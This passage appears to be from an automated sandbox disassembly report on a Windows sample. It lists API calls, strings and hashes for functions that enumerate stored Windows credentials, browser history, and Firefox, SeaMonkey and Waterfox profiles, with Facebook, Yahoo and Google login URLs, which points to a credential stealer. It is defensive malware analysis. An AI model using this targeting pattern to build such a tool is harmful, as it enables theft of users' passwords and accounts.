                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                      • CloseHandle.KERNEL32(?), ref: 0040E148
                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                      • String ID: bhv
                      • API String ID: 327780389-2689659898
                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                      Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2941347001-70141382
                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                      Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                      • String ID:
                      • API String ID: 2827331108-0
                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • wcschr.MSVCRT ref: 0040C324
                      • wcschr.MSVCRT ref: 0040C344
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • GetLastError.KERNEL32 ref: 0040C373
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                      • String ID: visited:
                      • API String ID: 1157525455-1702587658
                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                      • _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                      • API String ID: 3883404497-2982631422
                      • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                      • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040BC75
                      • memset.MSVCRT ref: 0040BC8C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                      • memcmp.MSVCRT ref: 0040BCD6
                      • memcpy.MSVCRT ref: 0040BD2B
                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                      • String ID:
                      • API String ID: 509814883-3916222277
                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                      Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                      APIs
                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                      • GetLastError.KERNEL32 ref: 0041847E
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile$??3@ErrorLast
                      • String ID: |A
                      • API String ID: 1407640353-1717621600
                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                      • String ID: r!A
                      • API String ID: 2791114272-628097481
                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                      • wcslen.MSVCRT ref: 0040C82C
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                      • API String ID: 62308376-4196376884
                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                      Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • wcslen.MSVCRT ref: 0040BE06
                      • _wcsncoll.MSVCRT ref: 0040BE38
                      • memset.MSVCRT ref: 0040BE91
                      • memcpy.MSVCRT ref: 0040BEB2
                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                      • wcschr.MSVCRT ref: 0040BF24
                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                      • String ID:
                      • API String ID: 3191383707-0
                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00403CBF
                      • memset.MSVCRT ref: 00403CD4
                      • memset.MSVCRT ref: 00403CE9
                      • memset.MSVCRT ref: 00403CFE
                      • memset.MSVCRT ref: 00403D13
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403DDA
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Waterfox$Waterfox\Profiles
                      • API String ID: 3527940856-11920434
                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00403E50
                      • memset.MSVCRT ref: 00403E65
                      • memset.MSVCRT ref: 00403E7A
                      • memset.MSVCRT ref: 00403E8F
                      • memset.MSVCRT ref: 00403EA4
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403F6B
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                      • API String ID: 3527940856-2068335096
                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00403FE1
                      • memset.MSVCRT ref: 00403FF6
                      • memset.MSVCRT ref: 0040400B
                      • memset.MSVCRT ref: 00404020
                      • memset.MSVCRT ref: 00404035
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 004040FC
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                      • API String ID: 3527940856-3369679110
                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
